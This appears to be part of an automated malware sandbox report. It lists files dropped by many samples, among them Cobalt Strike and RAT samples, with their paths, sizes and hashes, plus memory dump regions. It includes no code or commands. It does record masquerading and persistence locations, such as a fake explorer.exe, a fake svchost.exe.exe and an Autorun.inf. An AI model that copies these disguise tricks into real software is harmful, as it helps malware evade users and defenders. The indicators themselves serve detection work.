C:\Users\Admin\Downloads\240919-h8lpzaxdnn20e4741b072ee0faf322f0d6a0f43fa54a8ad986c834e4edac984b5fa035c28fN.exe

Filesize
44KB

MD5
c3976b443c6d06a7c4f83e49b0489ad0

SHA1
7b9a08450ade62da8ca892c582f67ce74fc0d14e

SHA256
20e4741b072ee0faf322f0d6a0f43fa54a8ad986c834e4edac984b5fa035c28f

SHA512
18914bea6ed6a4310900e34cda8e46314dd58923b08916ffbb1cec006497d85f9ca6cba3ee79018a519984bc33e7833941ebbd65f23658ff02067e67c4e09a00

Download Submit
C:\Users\Admin\Downloads\240919-h8xr8sxbmbead8622597de71be8384b3849c20216f_JaffaCakes118.exe

Filesize
181KB

MD5
2e6671fcac3bd42c397177ea510579ba

SHA1
f2b11a1b70691a69e6811a5d14bce9bd8793dd12

SHA256
22fbcfbb516395e1e2d4883192ca2dd6e9f04b71d80a98f062469e33ee76718f

SHA512
5e37b07429b62bb19da1a22895d70fb6137a7e9eb22869a35d6a15a661c20c9a1de114e5ed477a38da6aa91bbc34c00ff48c08675c8ddca37343333e61cbb7a1

Download Submit
C:\Users\Admin\Downloads\240919-h9trzaxbqcead8f1dcf05010828a696a45ff893580_JaffaCakes118.exe

Filesize
459KB

MD5
ead8f1dcf05010828a696a45ff893580

SHA1
b94d9a44de9a5c4ea983f3301054cff78cbdf30a

SHA256
b2a62e867b5e73f2efda52b77f29aba46bdb2b01545e657a4f27075fb01bb81e

SHA512
cede7d8a6b3ff1fb5a62c7585a5edd1d7fec46f237635460e42d4e651c494694af1d993759b5053dd8c2dd2b0ddcd6b1ca3c5bc6e0b2a623c104386884336dc6

Download Submit
C:\Users\Admin\Downloads\240919-hj38qawamg2024-09-19_1a5493b328c886fcb700dc374fe0552b_cobalt-strike_cobaltstrike_poet-rat.exe

Filesize
5.2MB

MD5
1a5493b328c886fcb700dc374fe0552b

SHA1
12918d4489a0dc1656e2ec6a388d821de09797d4

SHA256
bc7252f986d62ce64a3e84cf6db051dbbdf9e354fe0dc34f3d23ec4c840d090d

SHA512
867cbf47b0ba0bb8e5c36e98d3cc9bf1187ec4d2e36cdac897bbfb09a4b7c0bc3f716a84fbe8f8cdc1221e494572a90d744f1ba49a977f66da441ca5d36a5333

Download Submit
C:\Users\Admin\Downloads\240919-hjv74swamaeac961fb615a513bc979e5d0b3590e82_JaffaCakes118.exe

Filesize
172KB

MD5
259b398f88f5987cd1bea7cd96c18650

SHA1
f61c9b7a872a2dbcd143386d54d5c0bd2f476b00

SHA256
f5f83e7f7c79f0bff80d4e1e33d51d8403e1dfbc1954bfa53662cafa00672c68

SHA512
05af8507e12eff4a57a4eaa4907f76bb0eaab58ef8a6b0535bfb687eaee29921bc52a64936987a9de1e679f559011023d48e45519c76d5ef0285ac13dee813d2

Download Submit
C:\Users\Admin\Downloads\240919-hjz63awcnpeac97d7e01d0b3b14f85bb97239ecac5_JaffaCakes118.exe.tmp

Filesize
3.5MB

MD5
17853680db60b21ee83eaa064cc75d8c

SHA1
8782c11d173855e78d31dc54ef5c33f56fd4f226

SHA256
4eb61801b3246b39df945b82b9849f1f21450695bc3d8426112f0bc3e9808697

SHA512
27759034b36484a3688bb14a0a6243d085de96c36109908dd3faf768cddd947eaa330406b4ac47a4cd8f2a0bece67b34d4f1d5692381fca7585b9a47d80e8887

Download Submit
C:\Users\Admin\Downloads\240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe

Filesize
149KB

MD5
19991b926a7309100339750eb2538366

SHA1
0f6c91a8acf7ff449f718ca24ff8e3e847791e51

SHA256
60da9d53ac3137c955bf39cd7542cee86fe0a8fd7f61925c87289a2084e827e3

SHA512
1662a6e1b44684e90b19983c801b9a2a4b5b360019b9e22a7cad1776ff88221f8d70e377a66c14a4ed800d175a8442bd1978909eaa109cb2550a1ad0c36a9fdc

Download Submit
C:\Users\Admin\Downloads\240919-hpbewswelpeacc58a6b2cf9932ce06aa635d66c107_JaffaCakes118.exe

Filesize
320KB

MD5
3c9126f286afc2749b762ef3dc11bc12

SHA1
967f7d2d4de6f6db02fbcc6fcce2aa99bc27cf35

SHA256
e146328851c7422770597731d5f767b206d71b823219e2867dd71a43ed015006

SHA512
aa45fc5d2587b0a81069c76f183f09b5babefa3b5152cda0fbbbfe93f96906c8374ea8aae5655075f42cf68fef77c4c5b5d78c78dcdd832f90abaaf7a526820d

Download Submit
C:\Users\Admin\Downloads\240919-hq4g3awfkl051d6ca459ef525a93b6aa5be9d730d6faeb2b56fcfe508ef3cab54af2b8d377N.exe.tmp

Filesize
303KB

MD5
d1b3f8060bccadb1647f06530d936d52

SHA1
2f488223d80004c35987a3be84446284d8861e64

SHA256
59fa0dc3e27ebc7fa199b26af5b1114e21953d80606babfbc2f06e62d817689e

SHA512
083082f0ba1c5ff823b8bbc22a22c0fcc6938b5df789fa4a31556d87e778eb931e87b7d8d5e938843f906e7201531df87f513553860a301bf85927920668d824

Download Submit
C:\Users\Admin\Downloads\240919-hq9dbawfkqeacdc92f07f34dfddff6596a4faa0634_JaffaCakes118.exe

Filesize
296KB

MD5
f790051abc97764ff76622121c18088f

SHA1
357da27bc4a5857f8df2ffd6415d490f6c6b28b2

SHA256
19c99826664b401f86dea97d160c9bb4538fbbf7b36db9dca33b8da0ad9e760f

SHA512
919f221cddcd922d845abe0da8d1a46e044ec287911505986f6367723e8b605febb89e81ea410e0d17613e356f1323ee2363f302c3c6978a479aaa012548b8f6

Download Submit
C:\Users\Admin\Downloads\240919-hr84yawfnpb2e836c8e1b7029446fcfe45b046f5f9915ba2b62be87419fa3dd78c208632c4N.exe

Filesize
160KB

MD5
e1b333af57f317fae321dec8e88284cc

SHA1
e507ffe4cf2594cd32a2b8600e23c6e4c4dd5380

SHA256
35717d530bf6755de488d726fda127a3575836dc8cf933d3edba83d6754ccd58

SHA512
459423f9e5a1b23f8868d9099ef84eac641b305334dd9620c80698d0b2883b19b0f7a2ffd1a8f2fcd679d8ceef344bc7ce36b8822404d8c63538a7e95edf0f69

Download Submit
C:\Users\Admin\Downloads\240919-hrmkyawdldeace0c23b97c6b69fdb3c708967d8f78_JaffaCakes118.exe

Filesize
528KB

MD5
4091028a1de0e5143f0599c7a0a55011

SHA1
fe909853279709ddc3f3a56b751f86ae1b393ede

SHA256
f57954ec1cbb2a7aa495b8efb110785d679e6ce022eef1daac45fe8ea05e2b5a

SHA512
04e116e0a383292f13bbbed3debf4d0b7f1670ce91a9c1f53393e248587ffe6f487aa69c6dd2d59aea88d31e8689d82c5019e3ba00c2002159e7874df91c94f6

Download Submit
C:\Users\Admin\Downloads\240919-hsnjmawfpqa142af42dce4dd20008229039f08037ba558c721cd637f2e3d6e2122aab29b08NSrv.exe

Filesize
131KB

MD5
fbb49513fcf2ab18a1a2bf650c9de437

SHA1
6699c0233e814112890a49f5e87f264573e6aca3

SHA256
2126344baaeae6cae87473c1a0514efd82b81da2f24a9f3460dca0dd457047cc

SHA512
24b048ddce1e79c28db09a644a51cc8d9730591f822a51f5155a9f642dd6e5f7722ac0688efe86763975bb21be3420b1ae93160b310da11ab2f751b3706bf723

Download Submit
C:\Users\Admin\Downloads\240919-htd2kswdrfeacf4b7f8034890b3027188d63101a7a_JaffaCakes118.exe.tmp

Filesize
176KB

MD5
ffba728fc78016e5c7d9c92c57822f1d

SHA1
00eb1ae0b5c4f723e57e4d55389bbc180465cc11

SHA256
10b9133197777d593cb0fd3bccdff8fc6e0b12a983a9f1c5e5a6d2c74971bd27

SHA512
cf109994acd64231b1bb42de4b0a4e407fb2dd6e33e36f22974d5bf12ba329b3f338f77ff93873cc73c33ceaa0438251d86acc2f6c9ccb2d7c7fcdea236bc327

Download Submit
C:\Users\Admin\Downloads\240919-htjbaswejceacf717f23652f7fbbd15626dc55e8b8_JaffaCakes118.exe

Filesize
228KB

MD5
69672c3a9c039fba1509f180d141c9b8

SHA1
424bb00bc13220b51477f780a110b5f224319267

SHA256
816af1863f8f5eb35b503f2b39286a31a92f096ef355b676614ac54249b9b054

SHA512
f40ad73d712d3f02f54e397a81c9035f66dc97d091d09744900d8555c4b4396255e71f89db9bc0da18c54ebb4cf1487cf13e5fc9efb6446e05a02f467141e1cf

Download Submit
C:\Users\Admin\Downloads\240919-htnwsawgjmeacf81cdae6384b231c2da59b4b5c904_JaffaCakes118.exe

Filesize
316KB

MD5
a9df664f6c80af9b2fbb2f74c2051e87

SHA1
3964a7a1e990e041e09949e076eaeda6d6e80f62

SHA256
8200a863ab1b3b2edd1d0db15f12154fc14680ab2315c3801157e133c8d90e4d

SHA512
e9928e94847d17e00014dbe28287b10e29a5aa39b7bf57dede037c3f9bbb8dd42e78dcfe074a71e792466c6eff0636725edbc037dcd0115b04172cd0cd3e01ee

Download Submit
C:\Users\Admin\Downloads\240919-htp4vawgjna25713b54d44c600fa207070f662465684fb10108b7ef523c9ad774e38f3fea9N.exe

Filesize
29KB

MD5
2d4d711e9def1f3b5a8ede121b2e80c0

SHA1
10f77e5051d52c5cdc67b739d210fcc7d9cd8aa3

SHA256
a25713b54d44c600fa207070f662465684fb10108b7ef523c9ad774e38f3fea9

SHA512
aa8eb1cbc441c1af37bc4e6f1005953d750daac277722a0e1d51aaae6348991c2a55444d5318f8ed8dba73927634ab1f7aed7eb68e24f5a02f808bbb87e0391d

Download Submit
C:\Users\Admin\Downloads\240919-htqelswgjpeacf86f7aaeaafc2d0b1d251d2bfd268_JaffaCakes118.exe

Filesize
136KB

MD5
250e29cf330cd0e41e526c91eb84b3ee

SHA1
7b1827060663b46f1b66b8e590ab3c5a98b3653a

SHA256
306992a9cb23e9a489ab9b996889cfee8d6087d4ff43aa3038ecf34d7092febe

SHA512
601292f5a6ebc2b8cc305246416432f0f3c34b3f5446539acf454b8d2dcdc5a26e967b4c8e3af9e8ccfa0a6b93af310c6a0376b2958ba53b7161942a8f032296

Download Submit
C:\Users\Admin\Downloads\240919-hvzdxawemhicsys.icn.exe

Filesize
211KB

MD5
ff6ec88fc6abcd301feda708f11fada4

SHA1
c6c83afcc4030bbf1927ec05cda85481f3aa7a4d

SHA256
01e31e777d714149a6daa95035ce6cf3072d670582bece8081662ecbea5c8539

SHA512
1c30f40ff7d30048d7d3831aa538ac6dd1f2959385174e582023e140e3778e1eb0d837766be2ff2fee231de6eb80270e640c60126095deaec14112fd59b8db08

Download Submit
C:\Users\Admin\Downloads\240919-hw1ncswerhead0ef98e08f74f06ff3070f9a0153b2_JaffaCakes118.exe

Filesize
248KB

MD5
79862f9fdc9f09b2aafd7478ef438e16

SHA1
13592a264b44ca1d41623908ab3ddf62a3b26030

SHA256
4daa6896cb86f58966cbfa4a59f9dbfd5c084b53a84a7a87514ee12f82529a0d

SHA512
7a7e3db10fe884364bcee838bd49e07dca438696c73f17b94b84a61e4c80fae8a2b16072c10c1dffef33997cc579db646f4dc501a69f344a10e19de41b0a9a27

Download Submit
C:\Users\Admin\Downloads\240919-hw5bjswfjcead0ff047e5a4f6360c358b7f88cabc5_JaffaCakes118.exe.tmp

Filesize
253KB

MD5
43f9064429c396a98173eb8a64eb4346

SHA1
c9cbe820c9076bbc333a22d53886de43e3d30232

SHA256
f7ad96e4d7f2246df047452afe5d607f3532446d199bacfd53cb938aabd73fd1

SHA512
db876238007e62628af98536ba9185810381a7fd9a4a4e61ae519bdf9aa695702f218ed6361f0c377e515000720eedc87c28795b5a42a7b03ec7917e7dc0c684

Download Submit
C:\Users\Admin\Downloads\240919-hw5bjswfjcead0ff047e5a4f6360c358b7f88cabc5_JaffaCakes118.exe.tmp

Filesize
253KB

MD5
1ca1651ec1744b303caa01ebccaaa555

SHA1
fdc2035933d620cd28ed3dab66310712d7a94e27

SHA256
4eed5e1c10fa19c7cc93029c279589c53406394a6e62da26e235bb008356a28d

SHA512
eb5da3f7bfd67f6ebbc2c867034580d6ec6d67e8ac6f70d3bb5f3f227b049aae5118076aba6c11cfdb8ae71c28a4088821b38cd7a34460d5d3378d47bf6f0229

Download Submit
C:\Users\Admin\Downloads\240919-hwtvtawerb2024091898b941f7d27784673cfee33a67c2a6afpoetratsnatch.exe.tmp

Filesize
21.6MB

MD5
44ea80ee7cb27cc80218775f41d1f772

SHA1
133467efb2a88059cc815dd11318ab093f70d31c

SHA256
109d6b5591e593bfd6c7076ea8ae83e2579fb8f18ba02e9e8e2b1db4900e946f

SHA512
9c5c8a2c9dc51ad560cbe0ba5a7bb1f4d0005afa1236443cefbaa1d7861a048348abaea6ee47d0550560d04f82e653d82b884017ce0c0ea358ab9a2289c17af8

Download Submit
C:\Users\Admin\Downloads\240919-hxknjawhlq0bfaf5af70b11c4ebfd913e86fe67ebc5ec01c223994a97d8117024e319787c9N.exe

Filesize
283KB

MD5
9f9b04d99c2c024b79beddc40491bf27

SHA1
c20877225c212a547e13be23b5a65db4aadec505

SHA256
6c931b8908ae96cfc8ba11398d52cb728c99fcdc9150756f86bae24c3f3ea09d

SHA512
2f7f9d22205cb4db43d81991ae80bd7b18e45347c878307b78d360fd0939da1ec7f0973a14eb45f309c25a6906f436f917eed4dd13dca604905c613301ef2a2c

Download Submit
C:\Users\Admin\Downloads\240919-hxvthawhmn0f626eca4a80a70619bded3da7db0cbac8de8effb65482cdf05962ff789155be.exe

Filesize
3.9MB

MD5
5ffc2a72ff05e1f486e4aa0142b89a23

SHA1
1d7428dd31e095b0aa43a61c962e7d42587c3f0c

SHA256
0f626eca4a80a70619bded3da7db0cbac8de8effb65482cdf05962ff789155be

SHA512
3b9753133f33901cc5fe4cc9e13ddb860b6a4cbae572ba4aad0149589c4b162caa9352dc57831d9c532367e5f978e22de34612566990fd0e83aaba4797cec7d4

Download Submit
C:\Users\Admin\Downloads\240919-hy83hswfrdead25cab95581b873ca5ff12ef45dffa_JaffaCakes118.exe

Filesize
193KB

MD5
658982c2b46af01fb4f4cbbac5645368

SHA1
04ba779c2b6b9e76c583b78692bb1ee044bcf74a

SHA256
b92f161ede16f8b83e6b416d17e406383ccfc5410cff45384c236951d36fe5c5

SHA512
8da8da30aa87ec33cf1ec88deb2c177c13ef7a1a529ed9ec6635e77488e9beb8f99df2f8cf2739096d3556211865f4bc01bfc967d969157f03bd6862beb0a864

Download Submit
C:\Users\Admin\Downloads\240919-hycpbawfnaead1a0cdb38eeda7185764b7a898ea90_JaffaCakes118.exe

Filesize
324KB

MD5
222f1740893872c610e58776bf3afee3

SHA1
f00fc708709399d9f083f2844782138e900f7e87

SHA256
7fe44e0984cc9bd2abd38f71964d2dace21ab98f3541ff42d3a980ae98652db5

SHA512
78a266bdd38d921c48a5f8ff6ec5cba4b84c3ee83923999fcc2bb7bc2213efb0457e71099b57911c92707c93996287bf4af70ff80fce7ca95f1fcce50420817d

Download Submit
C:\Users\Admin\Downloads\240919-hzha7awfrgead2793e4c0f27b9cf4bf13be871b335_JaffaCakes118.exe

Filesize
508KB

MD5
c858125c0481ead86558bb7b0abe667b

SHA1
37ea1768d5d5f9d285dd3cdde16d6fc306df9013

SHA256
24c7b3bb6d3375083051117b2d73f13295b75ec73ce68ba36911bdc721c7bb06

SHA512
10a851a5da25429879df1e04e693b2da2b7806b2c6f11c2579281ca6e85ec83e1729b664ffa31ba0c832a1b8f11ce7a7aa6da6e7b90724e25e20ee2d19be57d8

Download Submit
C:\Users\Admin\Downloads\temp.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\Users\Admin\Downloads\temp.zip

Filesize
21KB

MD5
2c1a885eba7c6908582342636a484f93

SHA1
be96563d14d2e2212cd6c359dbf6172597cace2a

SHA256
04026dca63cf2f4e9049c5441c53372b336465da13643dca5ff3315642b89a0a

SHA512
00ebfc31a89a04aba22c567520134d85c95f83ff47b61c77f475c466e7337256f87a583b86892e3281a917f447dea8071c1f83a8865246640204d9d5029d4484

Download Submit
C:\Users\Admin\rUkMQwAI\VecwkMQg.exe

Filesize
226KB

MD5
0e0ba86385eb3e843fdcd5163e77aae5

SHA1
fa409b92dec83c4539e74a42c7563f850de10803

SHA256
9c278d6232d891433a5c5db4978f6a0adfe387a935557675be952ea1b07adcf6

SHA512
561d258c30a2bcd8168e99c8a9f7a3517f8b36e0b6fd76af7e42acd28bb549186178418764866e087eb3038ddf4554d36875f099e3999a892cd34763b71bbc96

Download Submit
C:\WINFILE.exe

Filesize
399KB

MD5
db856a8af639de8f25b631d93734e2d4

SHA1
c11b5f1ae8957752ab3f0bbd73af818452299fe4

SHA256
1f2cb1eb8e4e1c40a964148bd41ab3cd03b1a3fc05ebaa95050f810eb4bc45d9

SHA512
35eeaa6ac49871343455a6720d13c688b50ea20331eb73695540805f111b82b9319e7032f5bcef638a4906264f7440fefed9bb82988cee8e3fdb1459a82f0b9c

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
8adda01b4b5aa13a140ccbd291b6562d

SHA1
e002fd7f6db4dd554fc118325e5435ebc03e5ca9

SHA256
0693f9b2a0bfcf2a985ff14b4ca160bdc63d8ce004c980bec5f13dcc7f871dad

SHA512
d500d35147430694ce50e56c49ef266b311f83454c8ab70deaf30c1abead0c1ea9319f078dba86131a8518a9660134bc03d14c3c26efd720cb5a007f75324687

Download Submit
C:\Windows\SysWOW64\Ajpqnneo.exe

Filesize
352KB

MD5
94eedca8b082cd58316d5586d12a44bb

SHA1
41aeec12e98c2714a6bc52016fc604d42e920ba5

SHA256
e85ae00d3c59d4af0f5f9adbfc3f2fd2dc479c593c348afe6ff924d0b930fbc2

SHA512
a80519a5c1c922f9e4df97207d68bba6523ed77323a3425e36fd964902e4defd88f9cd4de23d25ee2a3f2ebbf1d2d867994c489e15bd2dc589a999a547ee923e

Download Submit
C:\Windows\SysWOW64\Alcidkmm.dll

Filesize
7KB

MD5
4f5f38723219c060033c1c9274d343cd

SHA1
e92f1e9528c971b0ed9b6b91c149068a3a39f73b

SHA256
67aac9bfaca864579ef56a41b33db965b7e92defa1f6e5d87f97464c5e65d896

SHA512
016c7d9f5d0351b2852865207305f2f9b7644178660de0cded8439642e7ae85ead6dbb9369448dabb4aad36bc77341f5e06d656a830b0dca30025181681ef156

Download Submit
C:\Windows\SysWOW64\Aneppo32.exe

Filesize
352KB

MD5
63cf4fe824cebac80d6544cd039ab4ad

SHA1
18100bfda0b22d2a5152c52ada26ec0d899f2935

SHA256
da18e03cb533ade8553072629c8d6b72697114ef706f6d8628332e717b69a845

SHA512
8e0d0991c248ea92521622d6fcf535b6682674406df5dce94f8bc094cf54ab10a29fe2b1e5d1ec95522166bed2f4e9f22fb328342f087ed1ce82308b3fa7e15a

Download Submit
C:\Windows\SysWOW64\Caageq32.exe

Filesize
93KB

MD5
776c3f84424c464cad39e78afc448661

SHA1
1a2e3ea62c99daaec3492e705a875be866ae3a39

SHA256
302763caa6dceb06567f0959d65cb8b9b0910a6ce490707736c50bf460d5f2e2

SHA512
01d22acec65610e1f24744b6426da10876790f65c53ccef3810f6d4311c27f3ffd4f5184270876e9099790ccd0d01dddfb2f7ec3db8fec6c63a0e0278d2655b5

Download Submit
C:\Windows\SysWOW64\Dobfld32.exe

Filesize
72KB

MD5
b8bd20ec0d058495db3dad249197c7ba

SHA1
f21079d6504d4a18358b2d99ab1eca8c83af5478

SHA256
7ad73754ba78779a32d746faa44c202ac610e05475d17dc89501f77c18df8bcc

SHA512
b2991da5d69deebbe74c2c01cc311f81604649d789232abecac048d8716fb3811d26100be15e4d4c950a45750c2bc84c173420533cef23f4c26ccf68d178e57b

Download Submit
C:\Windows\SysWOW64\Fbggjh32.dll

Filesize
7KB

MD5
f5747e86bb8358263310e087cdf12b15

SHA1
a16b86d630a9d961fc4c30c68d491ec8be7f15ab

SHA256
36d5b724f12cf1645cd258a253b4ce89e313eb22e04cdfd3dbfefda1eeaf2bb7

SHA512
7ee163813fde96120b73d807a6fde8a8ffcb13b3d1c7f6ca6268665c2fd1eb214371e63febd101c3618dd0257e43bffd2515a85e27291cd28d951d68941c7bce

Download Submit
C:\Windows\SysWOW64\Kantuk.exe

Filesize
323KB

MD5
eacc501779cdc2fda21e317648e08d0f

SHA1
d71ca3f7056b48cfa2492861f233e1f3bd507501

SHA256
16f7966200b4ba1364535b144ac53144f4f0e6cba24529a234b6c22f65fbc485

SHA512
b221044d1e68270b671e6844d7693a3e18af494d9cd6517c5c22dfbf78fb839a6a16b054bdf158b50e36a833cd05c125a270f0aaf970b98dd0e2b151d0e5748b

Download Submit
C:\Windows\SysWOW64\Kantuk.exe.tmp

Filesize
323KB

MD5
5a9885df0a260b6872435f546e62c53f

SHA1
96cdd85245adf31622dcefee9b5d73214feef7de

SHA256
da567a304612d83f6acc4fd05beab85d97b2aff6c170f3925327694052bec375

SHA512
df915f829d4b5c4c17dde1bfc5943be74b85d26a341ee5042a1ef7ea3c8192650b35561469b4bdad80862d33eb7d8aa3dbf7c277db810c560b1d63605a9621aa

Download Submit
C:\Windows\SysWOW64\Mmnhcb32.exe

Filesize
276KB

MD5
c778f5cd7df67497e0f1cc556a27d15d

SHA1
2fe17d11ae5d1ffb732d910658f5c84dc5e6a2a6

SHA256
83b16da121c16afa8f52f7997baf3cc58c7d20ad6958436431ef0fe3560266c4

SHA512
6f1cf1c5ca4c4083e3a96eb75105bf954145b23b6ec427286e7192c482191c6952e13858b05fbd6f0bea06de1243260b753034c5dbc0c97ebf3d01234ddefc03

Download Submit
C:\Windows\SysWOW64\Nlfelogp.exe

Filesize
640KB

MD5
0ea1f6cd35ea0b14e46627f47766e0e0

SHA1
cada46bdca07e2d05f7f9c74d68660702ed4c416

SHA256
7d69f7134e7458553ea4c834d0217b05d41b46c40fc0f3138f448b02a3927eff

SHA512
2a32720ef0e59a5471460c8105a73f93dc333b0a032500fb960f6f59b37f4631176c7602ccbe21ec6ad24c7fc68e3d19c9715bf9fd67ad848f6d91a1cbbb60db

Download Submit
C:\Windows\SysWOW64\XTOBCC\PIB.exe

Filesize
1.7MB

MD5
25b01545ae7ce140e20d146c1bf51a81

SHA1
f22ba0273c9731e20e6486d2e48b4893b610f645

SHA256
4a2a0412abf1780b987449e4440c8bfebe864a963ba8d03629b1b69e430f424b

SHA512
ce54ef58b1459ddffed91c9989bf60027437e7d225ccc1c8191c43c38ba9049043e309ba909aa16ab478033c35076a6e542070c6582453e641ebb6c75982239d

Download Submit
C:\Windows\SysWOW64\ntos.exe

Filesize
402KB

MD5
077514b6b58493fd0c1a3ad58d523c30

SHA1
f059afe47e32ea674edefbd01db26cb70c8035e7

SHA256
03ad949d3a4937263e9c96064f6ba711abc0fe0dc5c121840725cd9eb1a5d949

SHA512
9517965cef2c7486e23ff84dabf7cedfcc772b984ef1e3133503eea678b81c0add3e0430ae89c84da59049ff73328892b084147bb7152a88f5faeb060cc508da

Download Submit
C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe.tmp

Filesize
323KB

MD5
3d806f4f524fc1f4f4c18c2fc3e0feda

SHA1
2578fc4ab3583d9787c3d6bab74b3c6e8ad77f95

SHA256
408d3c8a94a9daaf3889de5183d72d62e5f47872fc83c03e816256b4b65d8ddc

SHA512
694fbeafc72022600fee82254651ab8351ea61dedc069e9bc1251fc518a206573009df1b035634f0c6131d16d75a83fcb6659cd6b6dedf3951da68c8c1161d5b

Download Submit
C:\Windows\System\svchost.exe.exe

Filesize
62KB

MD5
8ac7b99afee0321d9dac8059dda31fc9

SHA1
42a4ce9607adbdbb62908f1226c9f187532092ee

SHA256
f1a93bdd2be537ef62b13ff216930372afb1995200a4b008976cd345a73ae485

SHA512
bde4771fa54943d5744f64a4fb6d924de7401d1344265e4825f0d3f7bcc144e5a251f30476744afd69c193c19369953a9c30218ad5502b2e808edb81327be75f

Download Submit
C:\Windows\msorcvp.exe

Filesize
171KB

MD5
deffeb2bbd7789cf9aecda0aae227c1e

SHA1
ebd34cafa3c57bfe982b90b467d11f22afa9d353

SHA256
2c008d93048009d7d6e1b5dec9d026707efaa083c4aed14ef7a6a444aeac7e9d

SHA512
2b9f41e3317d752c1681afc9e7686b1851645c748d62cb4f7627649e45bdb1b274455f2de5b0517267c1d5ab9feded55caab563e5bb3b2a0f1435145e9525268

Download Submit
C:\btbbth.exe

Filesize
121KB

MD5
c070f326bf879e70bd82836486e32252

SHA1
93e608ff638409d18688a7dc74497bbf9738169f

SHA256
38039a9b41a49eac0da736f9bfcccc22718b8b374e4b2b183c4a806d753360f0

SHA512
7e5678b99f1235185f1d077e8191fc2d084f9b6fad0a491445617e9b09984996b299c981a29ef98d8f4ebe54d07e2b4a2040f3c5aafed8a127652d8ccefc086d

Download Submit
C:\ntldr~6

Filesize
1B

MD5
69691c7bdcc3ce6d5d8a1361f22d04ac

SHA1
c63ae6dd4fc9f9dda66970e827d13f7c73fe841c

SHA256
08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1

SHA512
253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

Download Submit
C:\ntldr~8

Filesize
440KB

MD5
eacd716e88ab706dfc44bb669b81c9ab

SHA1
5f43816eed95c2a5c215fde7299561f8443054f9

SHA256
2310d2de9bb0080f314923271c20195863c9daa3d1f7bad95b4eed3baaefcd9f

SHA512
a82a72b3604babc2204a0afa7b264b88b9b7fd2c6545b338632515f9a93d87be32e8f395a6552fc3d99fd54bc70be9c820a57c1483430a262494c619cd1b92a3

Download Submit
C:\vdvjd.exe

Filesize
64KB

MD5
78233975d82f922b0a49bf7bc6c59de4

SHA1
ca7e320c0906e3012001a7716434c135a3802047

SHA256
ffe48e83d0628650c33a86467abf85b09572e2a5a8dc88a527dda20878ba9c02

SHA512
8c7c7e5ebfba5318dbf71be0f1c2a49d5f3818cb169d98f83b6322907344643282199cd72aedc66c54a94711facd3b3c5c30a89f61e230935cd201b36b50dd8c

Download Submit
F:\Autorun.inf

Filesize
237B

MD5
94bcd02c5afd5918b4446345e7a5ded9

SHA1
79839238e84be225132e1382fae6333dfc4906a1

SHA256
5d9f41e4f886926dae2ed8a57807708110d3c6964ab462be21462bff0088d9a1

SHA512
149f6bd49fc3b62fa5f41666bfb3a58060514eec1b61c6aa1ac4c75417c840b028e701eb5533460eb00e2fee8543379564bc47d7477264771d81b99a0caab500

Download Submit
memory/404-205-0x0000000000800000-0x000000000080A000-memory.dmp

Filesize
40KB

Download
memory/632-348-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/660-325-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/660-172-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/828-694-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1016-192-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1016-166-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1016-311-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1036-589-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/1036-177-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/1216-251-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1472-574-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1512-573-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1600-310-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1600-165-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1648-208-0x0000000000432000-0x0000000000433000-memory.dmp

Filesize
4KB

Download
memory/1648-164-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/1656-249-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1956-314-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2076-170-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2464-836-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2808-837-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2964-317-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/3000-252-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/3400-312-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/3408-250-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/3488-572-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/3584-1905-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3584-206-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3720-1904-0x0000000010000000-0x0000000010048000-memory.dmp

Filesize
288KB

Download
memory/4468-313-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/4508-239-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4512-152-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/4512-1900-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/4544-1188-0x0000000000400000-0x0000000000429000-memory.dmp

